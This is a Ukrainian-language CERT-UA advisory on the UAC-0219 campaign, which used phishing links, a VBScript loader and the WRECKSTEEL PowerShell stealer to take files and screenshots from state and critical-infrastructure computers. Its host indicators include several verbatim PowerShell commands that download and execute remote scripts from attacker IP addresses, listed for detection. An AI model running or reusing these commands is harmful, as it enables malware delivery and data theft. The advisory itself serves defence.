Увага! Нові кібератаки на об’єкти критичної інфраструктури та держустанови

Загальна інформація

Урядовою командою реагування на комп'ютерні надзвичайні події України CERT-UA вживаються системні заходи щодо накопичення та проведення аналізу даних про кіберінциденти з метою надання актуальної інформації про кіберзагрози.

Так, протягом березня 2025 року зафіксовано щонайменше три кібератаки стосовно органів державного управління та об'єктів критичної інфраструктури України, що мали на меті збір та викрадення інформації з комп'ютерів із застосуванням відповідних програмних засобів.

Для реалізації зловмисного задуму з використанням скомпрометованих облікових записів здійснюється розповсюдження електронних листів з посиланнями на публічні файлові сервіси DropMeFiles, Google Drive тощо (деколи посилання містяться у PDF-вкладеннях), відвідування яких призведе до завантаження та запуску VBScript-лоадеру (зазвичай має розширення ".js"). Призначенням останнього є завантаження та запуск PowerShell-скрипта, який забезпечує пошук та вивантаження за допомогою cURL файлів відповідно до списку розширень ("*.doc", "*.txt", "*.docx", "*.xls", "*.xlsx", "*.pdf", "*.rtf", "*.odt", "*.csv", "*.ods", "*.ppt", "*.pptx", "*.png", "*.jpg", "*.jpeg"), а також знімків екрана комп'ютера.

Детальне дослідження кіберзагрози дозволило зробити висновок про те, що описана активність здійснюється щонайменше з осені 2024 року. При цьому протягом 2024 року під час здійснення кібератак використовувалися EXE файли, створені за допомогою NSIS-інсталятора, що містили документ-приманку (PDF, JPG), VBScript-стілер, а також програму-графічний редактор "IrfanView", що використовувалася для виготовлення скріншотів (слід зауважити, що з 2025 року функціонал виготовлення знімків екрана реалізовано за допомогою PowerShell).

Основний програмний засіб, версії якого відомі на мовах програмування VBScript та PowerShell та який призначений для викрадення файлів, класифіковано як WRECKSTEEL.

Активність відстежується за ідентифікатором UAC-0219.

Беручи до уваги нерезидентність стілерів як таких, у разі виявлення ознак здійснення кібератак просимо невідкладно інформувати CERT-UA з метою вжиття оперативних заходів кіберзахисту.

Індикатори кіберзагроз

Мережеві:

(15.09.2024)

hXXp://172[.]86.114.149/seeddoc.exe

hXXp://172[.]86.114.149:80/upload

172.86.114.149

(07.10.2024)

hXXp://167[.]88.167.254:80/upload

hXXp://45[.]61.159.252/visa_letter[.]exe

hXXps://drobbox[.]cloud/

hXXps://mfashara[.]com/

167[.]88.167.254

172[.]86.116.135

172[.]86.65.194

185[.]212.44.87

45[.]61.159.252

drobbox[.]cloud

mfashara[.]com

(15.02.2025)

hXXp://45[.]61.157.179/script.ps1

hXXp://45[.]61.157.179/upload

45[.]61.157.179

eschool-ua[.]online

www.eschool-ua[.]online

(10.03.2025)

hXXp://172[.]86.88.186/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_10.03_PDF.pdf

hXXp://172[.]86.88.186/scripttest2.ps1

hXXp://172[.]86.88.186/upload

hXXps://dropmefiles[.]cc/ua/d/5l8x3hv/c2e4a009b0acaea484f4384134824c69/58ffd536202b020abd5b1ea453297b2a

hXXps://dropmefiles[.]cc/ua/d/pweym/db923cfd3b8b67f23a1b6dee06f1f66c/62bef3a44fd6eb0da37ffb4121c6f354

hXXps://dropmefiles[.]cc/ua/d/q5cy/17063277217449d39e2328a007ffb4fa/92deaf866f3f75970690704420b9dac9

hXXps://iocreestr[.]tech/zakon_rada/cabinet_ministriv_postanova_1559_2024/read/

172[.]86.72.194

172[.]86.84.84

172[.]86.88.186

45[.]61.141.215

91[.]203.63.10

iocreestr[.]tech

rrrt[.]website

(18.03.2025)

hXXp://172[.]86.104.17/Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf

hXXp://172[.]86.104.17/scratest.ps1

hXXp://172[.]86.104.17/upload

hXXp://172[.]86.88.15/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_06.03_PDF.pdf

hXXp://172[.]86.88.15/scripttest.ps1

hXXp://172[.]86.88.15/upload

hXXps://api.ipify[.]org

hXXps://drive.google[.]com/file/d/1bsf3i4f0jsb8bpdsxeedaejpenzo0nwt/view?usp=sharing

hXXps://dropmefiles[.]cc/ua/d/zfkwbuvs/326a8605975106f1672c912bd16b4e7b/30b6e997a451bbf19384612a848c5536

143[.]244.46.116

172[.]86.104.17

172[.]86.88.15

91[.]203.63.10

workai[.]work

(20.03.2025)

hXXp://144[.]172.98.178/Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_platy_20.03_PDF.pdf

hXXp://144[.]172.98.178/scretest.ps1

hXXp://144[.]172.98.178/upload

hXXps://dropmefiles[.]top/ua/d/ebc5ka/d996e31032e7c288d7e20e7b82221c20/aefdd4d762a9657db41c23f9c4de424a

144[.]172.98.178

91[.]203.63.75

Хостові:

%TEMP%\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_27.03_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://107.189.20.74/screvan.ps1' | iex"

%TEMP%\Spisok_spivrobitnykiv_na_zmenshennya_zarobitnoyi_plati_31.03_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.122.94/scrxxx.ps1' | iex"

%TEMP%\Zmini_v_hrafiku_roboti_spivrobitnykiv_14.04.2025_PDF.pdf

powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.104.17/scratest.ps1' | iex"

%PROGRAMFILES%\IrfanView\i_view64.exe

%TEMP%\Ahmad_Aldhefairi_Visa_Appeal_Letter_PDF.pdf

%TEMP%\AppFinalDesktop.vbs

%TEMP%\lumina.exe

powershell -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://144.172.98.178/scretest.ps1' | iex"

powershell -ExecutionPolicy Bypass -NoProfile -Command "iwr 'http://172.86.88.15/scripttest.ps1' | iex

powershell -WindowStyle Hidden -nop -exec bypass -c "iex (New-Object Net.WebClient).DownloadString('http://45.61.157.179/script.ps1')"

wscript.exe "%TEMP%\AppFinalDesktop.vbs"

Графічні зображення

Рис. 1. Приклад ланцюга ураження